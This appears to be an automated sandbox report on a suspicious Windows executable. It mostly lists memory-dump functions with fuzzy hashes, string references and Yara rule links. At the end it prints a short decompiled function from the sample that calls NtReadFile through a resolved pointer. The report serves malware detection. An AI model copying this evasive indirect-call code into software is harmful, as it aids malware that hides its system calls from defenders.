Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0059be29a7b1ecbfc94d9af278f78907873c1fc8ff70d8e914dfcb5f315fa43
Instruction ID: c53d3b2595f7c9697c9bfc48c0bf0d5174b386c57c51f6404804de1951e12381
Opcode Fuzzy Hash: f0059be29a7b1ecbfc94d9af278f78907873c1fc8ff70d8e914dfcb5f315fa43
Instruction Fuzzy Hash: 40E06D3090A248DFCB28DBA4D64559DBFB4FF4A201F2441EAC455A3212C3320A15CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01BA3F42, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b64ea1844ea84f4b54975885bab6d67bfc9257bc974967f5e24f5cc378cb3423
Instruction ID: dd12f4e37788a73c77678092465390b2868a9cd99655ff76e7e2530525421760
Opcode Fuzzy Hash: b64ea1844ea84f4b54975885bab6d67bfc9257bc974967f5e24f5cc378cb3423
Instruction Fuzzy Hash: 9DF0F270D1A248AFCB15DBACC8406ACBFF4EB4A204F2481EAD85897262D3325A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01BACA14, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfcd23cb95b3f90ac84e0cc45e4e929ab9538dea6ba684765bd372c0d17f4f6c
Instruction ID: 5dca8d851f96bb7ce4fc8d8a88b17758c057d8efdfc5a33e8129d682e8297e43
Opcode Fuzzy Hash: cfcd23cb95b3f90ac84e0cc45e4e929ab9538dea6ba684765bd372c0d17f4f6c
Instruction Fuzzy Hash: DEF0F434905268CFCB249F64C9587DCBB71AB86316F9041D9C046A7290CB355EC6DF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC20C, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aad86d00a1eb5e986d3c6a8e4104315bcab75eebfb5b8a6e837c4f4810444d2
Instruction ID: f614efdcba207ba9fde67cbcd7434558835f688d69a87f08eb25cc78ca006f77
Opcode Fuzzy Hash: 4aad86d00a1eb5e986d3c6a8e4104315bcab75eebfb5b8a6e837c4f4810444d2
Instruction Fuzzy Hash: 30F0F275A08218DFDB10CF94C991BDDBBB8EB19305F8441D6D549E7241C736AA86CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD368, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaec83411fc04b9f08ffe34cd03f86cb4a019f9d7fd7f7e95901fcd6150a3ded
Instruction ID: b595ad1073b06be25eb8c78200d722649aa94eac01d4d6d478d088f346ada4a5
Opcode Fuzzy Hash: eaec83411fc04b9f08ffe34cd03f86cb4a019f9d7fd7f7e95901fcd6150a3ded
Instruction Fuzzy Hash: D7F01538904208EFCB04DFD8D9409ADBBB5FB48300F10C1A9EC0853351C7329A21EB40

Uniqueness

Uniqueness Score: -1.00%

Function 01BA2BF2, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ad7a752c6fef50c0759d4bafba6c21a4c9761cefa067193ffbff61a83999f6
Instruction ID: 25c7a4d29d671828425da02a52f06e730a9dc3abe5b9fc3f02312f952674905d
Opcode Fuzzy Hash: 14ad7a752c6fef50c0759d4bafba6c21a4c9761cefa067193ffbff61a83999f6
Instruction Fuzzy Hash: 8CE06D74D09248AFCB05DFB8D84969CBFB4AF05301F5181EAC858A7342E7314A54CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01BA42EA, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e786a910cc7dc049d8fed88cd9bd82fb58525f6795f7336de8ca3e4e6f2a575
Instruction ID: 9e05eeb3060f9b4836d3b0b47970d82880ac487f4218102874cef21f5272787c
Opcode Fuzzy Hash: 3e786a910cc7dc049d8fed88cd9bd82fb58525f6795f7336de8ca3e4e6f2a575
Instruction Fuzzy Hash: 45F0F438A11218CFCB24CF28D89879DB7B2FB4A310F1045EAC40EA3258CBB05E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 01BA01E0, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ec1f1a76a1ff04c1c120af24f4378dfc70e5e9c07705176e7d2fd583168123
Instruction ID: 74fc21485c40d6a829f07af6f6d7d20578669f211fad048aa4e06db10b60dcea
Opcode Fuzzy Hash: 66ec1f1a76a1ff04c1c120af24f4378dfc70e5e9c07705176e7d2fd583168123
Instruction Fuzzy Hash: 1CE04F34909308EFCB18EFA9D90459CBBB4EB44301F1092EAD80453340D7315E94DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD498, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6eab33472d6a5d02047ad2ed854e678bdea2b80869309cbda7c6a5454cc4d5
Instruction ID: f16c66612fa54acc9273f32ee7b6a610a015bd24f405ed9ed43c727d6ac430c1
Opcode Fuzzy Hash: 5d6eab33472d6a5d02047ad2ed854e678bdea2b80869309cbda7c6a5454cc4d5
Instruction Fuzzy Hash: 0AE0E574908208EFCB04DFA8D5405ADFFB4EB58300F10C2EADC4453341DB35AA51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD318, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6eab33472d6a5d02047ad2ed854e678bdea2b80869309cbda7c6a5454cc4d5
Instruction ID: e20aee0a470f41d6d69535d96da03dd24796d8d5d06edcb230697e210e5f0586
Opcode Fuzzy Hash: 5d6eab33472d6a5d02047ad2ed854e678bdea2b80869309cbda7c6a5454cc4d5
Instruction Fuzzy Hash: 13E0E578909208EFCB04DF98D5445ADBFB4EB48300F20C1EAD85453341D7319A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01BAAA29, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4e9d72d6f2a625a14ecb2f3e123386a27706dc0913a1b576127a466e9e0b34
Instruction ID: d37167352fd672119003185aa39c2713d19f26f08762cbaa9e6531b74d01e12b
Opcode Fuzzy Hash: 7c4e9d72d6f2a625a14ecb2f3e123386a27706dc0913a1b576127a466e9e0b34
Instruction Fuzzy Hash: 29E0DF3440A345DFC711EB78D1610AE7FF0FF0B214B1420E9D4488B293E7316A1ACB10

Uniqueness

Uniqueness Score: -1.00%

Function 01BA2A1A, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7cd77b3ff8f9dd8f6dd0524fc3980bf7d9edffbd9503184237e0759f594d264
Instruction ID: fbbb39b0f5435bc8d88c0e7422682ab8518f280adb7c8f2a067c555f89f0d0cd
Opcode Fuzzy Hash: b7cd77b3ff8f9dd8f6dd0524fc3980bf7d9edffbd9503184237e0759f594d264
Instruction Fuzzy Hash: FAE01A74D0A248EFCB16DFA8D95069CBF72EB45301F6081EEC804AB351E3354A94CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01BA1260, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976500754e400ab9bb501b02c7e9d8a6e38e4c61ced1644b10404dd0f808bd8e
Instruction ID: 85084940d2c89aa80e6657f92640eb870e65063dfec758d8cd4a9c48bc7c8b1a
Opcode Fuzzy Hash: 976500754e400ab9bb501b02c7e9d8a6e38e4c61ced1644b10404dd0f808bd8e
Instruction Fuzzy Hash: B6D02EB108A3809FC32A1AA8AC007F83F145307E02F8021CFC888DB183C722C018C2E3

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD4E8, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bc46092fefd443916527e26017bd639decd6e5494d300d3eb5fab7dcb1feb1
Instruction ID: a0c7ae41d7756bd2a225aeed11611cd2721bc31598136bdb71460bd85506bf83
Opcode Fuzzy Hash: 74bc46092fefd443916527e26017bd639decd6e5494d300d3eb5fab7dcb1feb1
Instruction Fuzzy Hash: 40E09274D09208EFCB08DF98D5416ADFBB8FB88304F2085E9D84997345DB31AA42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01BA4018, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8017fd98e678912bba991f20bcedaeaa4672b418e932425e264e76b8fe68b4f
Instruction ID: ce242b30344e9ac4476b807ae4f43d619d9f9349f139ee2804081331000cc2be
Opcode Fuzzy Hash: e8017fd98e678912bba991f20bcedaeaa4672b418e932425e264e76b8fe68b4f
Instruction Fuzzy Hash: E3E04670C4920CEFCB28DFA8D4449ADBFB9EB88300F6081ADD81467310D771AA90EF94

Uniqueness

Uniqueness Score: -1.00%

Function 01BA3810, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aff4792b3b7ff5ad7d4df491a7e9d0cb5419a2f69181667b062b00ea7e13408
Instruction ID: 82f6c6dd03908bcd3a4cc07fc1184e6029c6400892358ed6a79ab8768795bbc6
Opcode Fuzzy Hash: 4aff4792b3b7ff5ad7d4df491a7e9d0cb5419a2f69181667b062b00ea7e13408
Instruction Fuzzy Hash: B4E0B674D49208EBCB14DFA8D9859ADBFB8FB44300F6092A9982463354D7705A54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01BA2C00, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62072270443564127e96d069277d6d18653a0e1ced571943c1e0a24b45e413a0
Instruction ID: 423175cf4779940b6d55f6e33ea43d6f623012683d238b97c413529a206557c2
Opcode Fuzzy Hash: 62072270443564127e96d069277d6d18653a0e1ced571943c1e0a24b45e413a0
Instruction Fuzzy Hash: 4CE0EC74D49208EFCB18DFE8D945AADBFB8EB44300F6092EAD81467345D7705A90CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01BAAB88, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 836e179942330ff2ced5d04dd6d2f530f32be6f469c36f1928571f672b27441c
Instruction ID: a42e00aa00d49a1cac21409e84f966b14ed24d990be542055636b78c37351417
Opcode Fuzzy Hash: 836e179942330ff2ced5d04dd6d2f530f32be6f469c36f1928571f672b27441c
Instruction Fuzzy Hash: B1E0EC74D0920CEFCB14EFA8D5455ADBBB9FB48300F5086E9D808A3354D7305B50CB55

Uniqueness

Uniqueness Score: -1.00%

Function 01BA4ACB, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47de43296648fdc9c79045248a7a145bf5563090f857d6eae265676dea76370b
Instruction ID: 10a4cb9b3253b7674accece2e8145adddfde6e11d02afcb585acc56be7fe4c34
Opcode Fuzzy Hash: 47de43296648fdc9c79045248a7a145bf5563090f857d6eae265676dea76370b
Instruction Fuzzy Hash: 3DE08C3580E244DFC714DFA8DA566AD7F70FB0A301F1805EED809A3392E7711A18CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01BABC70, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d997c70bb79206230442c7812fe7b690f0d129372d7d7029ab1cf276874767fd
Instruction ID: d34d7ae14629511ebdf532f4747fedf966c9add86d75e6f06d9c17f5a69351b3
Opcode Fuzzy Hash: d997c70bb79206230442c7812fe7b690f0d129372d7d7029ab1cf276874767fd
Instruction Fuzzy Hash: D7D05E30809208EFC718EFE8E605AAEBFB8FB4A301F5042E8D84823344DB301A50CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01BA0070, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4332b444a521abf92d7722f91fe6f6a8913eefff3fa41ebf3a40947b524a8e59
Instruction ID: d68fcdcaf02a5dccc2428f443f067d3d10bf15a831555aa12ca480064ba3e58f
Opcode Fuzzy Hash: 4332b444a521abf92d7722f91fe6f6a8913eefff3fa41ebf3a40947b524a8e59
Instruction Fuzzy Hash: 7AE0EC30806209EFC729FFB8D90965C7FB5EB04206F1056BDD80553245DB715A64CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01BABFC0, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af70c18b5a407070f9d868da78f71845b1c65872d72ff1179d583ca493ed39d
Instruction ID: 33e3e12054176de20940ad678f124abe9021d97ecd1052a0a40c05ee75e49362
Opcode Fuzzy Hash: 0af70c18b5a407070f9d868da78f71845b1c65872d72ff1179d583ca493ed39d
Instruction Fuzzy Hash: 04D05E3480A208DFC718EFA8E6055AEBFB8FB8A305F5042E9D80823344C7321A50CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01BA4AD8, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc62709eb37c6e92c2aabc4b587d29a7fc8bafa475e2c1a23972ed9645363170
Instruction ID: b6c61396c14c2d29a2c3140b0e4ec250446ee6883d60ab0e2b05ad46ecc5ee3d
Opcode Fuzzy Hash: cc62709eb37c6e92c2aabc4b587d29a7fc8bafa475e2c1a23972ed9645363170
Instruction Fuzzy Hash: 85D05E3481A208EFC714EFA8D5596ADBF78FB09301F5001E9D80963384E7B05A44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 01BAAA38, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e260181ec5946422f7fe3a8e743158e6ae8f7238ad0eba9818ba8ad0666178
Instruction ID: b7bad1464735508442a7397666dfdac70dffa4a3ef0e1ab5b2bf02f61cc02f3b
Opcode Fuzzy Hash: d9e260181ec5946422f7fe3a8e743158e6ae8f7238ad0eba9818ba8ad0666178
Instruction Fuzzy Hash: 46D05E34819208DFC714EFB8E6196ADBFB8FB09601F5012E8D84963384E7305E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01BA2A28, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdfb61a1b4f7d2c016093ed713d3cc11a07baf9b7a42469b8a611890c571edee
Instruction ID: 8ed03a6c0e8f53af45a6ea7515c26b356a4aef39963e3bf795c36b71acf47632
Opcode Fuzzy Hash: fdfb61a1b4f7d2c016093ed713d3cc11a07baf9b7a42469b8a611890c571edee
Instruction Fuzzy Hash: C1E0E274D0520CEBCB18EFA8D481A9CBBB9EB44301F6081EDC81467340D731AA91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01BAC955, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e78798cd9e2c4f2f8fd539b7ee5c4b49888d744e058a63abbebd908f256fe6e
Instruction ID: 8221df71566cffe8f876df3fd0123f14f13dd9b5bb15e42f590476331c0bf8f6
Opcode Fuzzy Hash: 8e78798cd9e2c4f2f8fd539b7ee5c4b49888d744e058a63abbebd908f256fe6e
Instruction Fuzzy Hash: 30E0B638848128CFDBA49F20D984BDCBBB1FB55305F9045D6D449A3255CB768EC6DF01

Uniqueness

Uniqueness Score: -1.00%

Function 01BA428C, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bbae4f8b4a182294466a82b878b71d3248bcb691196a7f7fb61238ad71051c5
Instruction ID: 7b41bdee5a0a539c834fd3b145a8b5558e9af28bbc468230bd6f3a7ea244df5e
Opcode Fuzzy Hash: 4bbae4f8b4a182294466a82b878b71d3248bcb691196a7f7fb61238ad71051c5
Instruction Fuzzy Hash: B9D0173460620DCFCB28CF28D1986DDB7B1FB05304F5405A5D105A3148CBB58E828F63

Uniqueness

Uniqueness Score: -1.00%

Function 01BA1270, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648d0111390ffbfade51ed310d85a6dabfaec3ef9c6807074b4788e3c3a5be3d
Instruction ID: 2d8def6407b5429c39f708bc71547837458b2b7e9a69a1666af3b138f52dffe0
Opcode Fuzzy Hash: 648d0111390ffbfade51ed310d85a6dabfaec3ef9c6807074b4788e3c3a5be3d
Instruction Fuzzy Hash: 00C08C70009708EBC2AC22DCAC087B83A8CA342B09FA02298960D920828BA0D0A0C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 01BAB817, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ca9b1e3052b8754e74e99a7368b3652012dbeb9f138b88c733726e56203576
Instruction ID: b6ac68df5697093b9bc6e1b5e81b16c983ae73af9b5441c3be345e6edeec43a1
Opcode Fuzzy Hash: b8ca9b1e3052b8754e74e99a7368b3652012dbeb9f138b88c733726e56203576
Instruction Fuzzy Hash: 80D048B8806228CFEB60CF24DA68B89BBB0BB08305F0002E9D509A3380DB301A80CF10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01BA1298, Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

:@fq, xrefs: 01BA13DB
f]kq, xrefs: 01BA12F3
>_kq, xrefs: 01BA13F8

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :@fq$>_kq$f]kq
API String ID: 0-1744552541
Opcode ID: 94ca3a9f40018f979cde61e0a85d6ccd2776bad0ece3a9923b043eecce503dbb
Instruction ID: 2efd467455c446b7f0244099ead6b51395a59c08d282672d31af3eee7c673ce9
Opcode Fuzzy Hash: 94ca3a9f40018f979cde61e0a85d6ccd2776bad0ece3a9923b043eecce503dbb
Instruction Fuzzy Hash: 75613A70A00209DBD718DFAAED9468DBBF3FB98304F24C22ED50897698EF745906CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01BA12A8, Relevance: 3.9, Strings: 3, Instructions: 151COMMON

Download Yara Rule

Strings

:@fq, xrefs: 01BA13DB
f]kq, xrefs: 01BA12F3
>_kq, xrefs: 01BA13F8

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :@fq$>_kq$f]kq
API String ID: 0-1744552541
Opcode ID: f4a5bf3244994c5f623e618ce128a94e9c48ddbebd260698debb5f5ef5754ca2
Instruction ID: 398396ba3c1a24024b1b820038cfc58b78aa37dfb51df47defdfc89bf878ab90
Opcode Fuzzy Hash: f4a5bf3244994c5f623e618ce128a94e9c48ddbebd260698debb5f5ef5754ca2
Instruction Fuzzy Hash: FF611870A00209DBD718DFAAED9468EBBF3FB98304F24D22ED50897698DF745916CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01BA4B09, Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

:@fq, xrefs: 01BA4C34
>_kq, xrefs: 01BA4C51
f]kq, xrefs: 01BA4B68

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :@fq$>_kq$f]kq
API String ID: 0-1744552541
Opcode ID: 16f2ce4c81087ff59aaf1e273546bf872f7b48d846a7f85d6231bf7efb37d45f
Instruction ID: fa83555134fc8f67029c351d9e54eb7f78f2c924a33bba1161186f38f0c9f345
Opcode Fuzzy Hash: 16f2ce4c81087ff59aaf1e273546bf872f7b48d846a7f85d6231bf7efb37d45f
Instruction Fuzzy Hash: EB516B70A01209CFD718DFAAE86478DBBF2FB99309F14C16AD1089B268DF7459068F51

Uniqueness

Uniqueness Score: -1.00%

Function 01BA4B18, Relevance: 3.9, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

:@fq, xrefs: 01BA4C34
>_kq, xrefs: 01BA4C51
f]kq, xrefs: 01BA4B68

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID: :@fq$>_kq$f]kq
API String ID: 0-1744552541
Opcode ID: 3fa920b689b0547f900b192e00e3bc597f25c7ce983ab8e2c57c601974b208a0
Instruction ID: 1e66613d8b80c1bdee249d71fa35e7f99d763357ab3708fe491bdcdc9728c728
Opcode Fuzzy Hash: 3fa920b689b0547f900b192e00e3bc597f25c7ce983ab8e2c57c601974b208a0
Instruction Fuzzy Hash: 57515C70A0120ACFD718DFAAE86478EBBF2FB99309F14C16ED10897268DF7459068F51

Uniqueness

Uniqueness Score: -1.00%

Function 01BA4D51, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e70f89d07fa4d48515d95a26919fddeb5236a1b797653394640fc6f00d74bd
Instruction ID: 6b077d52840b4a42d5bfaab4127bb3c80d26a8352c9f240a055bf56796e6ba9b
Opcode Fuzzy Hash: 12e70f89d07fa4d48515d95a26919fddeb5236a1b797653394640fc6f00d74bd
Instruction Fuzzy Hash: 875193B1E056588BEB5CCF6B8C4069EFAF7AFC5210F18C5FA895DA7264DB3009458F01

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD520, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4175fe2f27581b6e053a4bf37defacb7e92f03f9d110510279f95cbc59e2b658
Instruction ID: 4bcc59817e451a4f2ef5e2c67812dd4d554099205243c427811ff871adcc71e2
Opcode Fuzzy Hash: 4175fe2f27581b6e053a4bf37defacb7e92f03f9d110510279f95cbc59e2b658
Instruction Fuzzy Hash: 40113770D182598EDB14CFA9C858BFEBFF0AB0A304F1494A9E440B3240C7748A44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 01BAD530, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675931294.0000000001BA0000.00000040.00000001.sdmp, Offset: 01BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b72cd7c53dffc05dce9d1d00357e592cce7363fa66eee59ccb916cf8223eb69a
Instruction ID: 597639e51fb889fdf213b1e9861993f11c261ab4483270ddb973591cc938b34f
Opcode Fuzzy Hash: b72cd7c53dffc05dce9d1d00357e592cce7363fa66eee59ccb916cf8223eb69a
Instruction Fuzzy Hash: E2110A70D142199FDB54DFAAC848BFEBEF4AF0A304F549469E444B3240D7748A40CF68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: JdtN8nIcLi8RQOi.exe PID: 5756 Parent PID: 6596 JdtN8nIcLi8RQOi.exeCOMMON

Executed Functions

Function 0041825A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: 4a99894f429c2e71b1c0bf4aa8afc784ec91ddfa249cd21115a227d55053ac79
Instruction ID: c3685ad5ac88296014570c4ea461c8993f1b39287c1ad2772a9a15dad1fe16cc
Opcode Fuzzy Hash: 4a99894f429c2e71b1c0bf4aa8afc784ec91ddfa249cd21115a227d55053ac79
Instruction Fuzzy Hash: 52F0F9B6200108AFCB14CF99DC81DEB7BA9EF8C354F158249FE0DA7241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
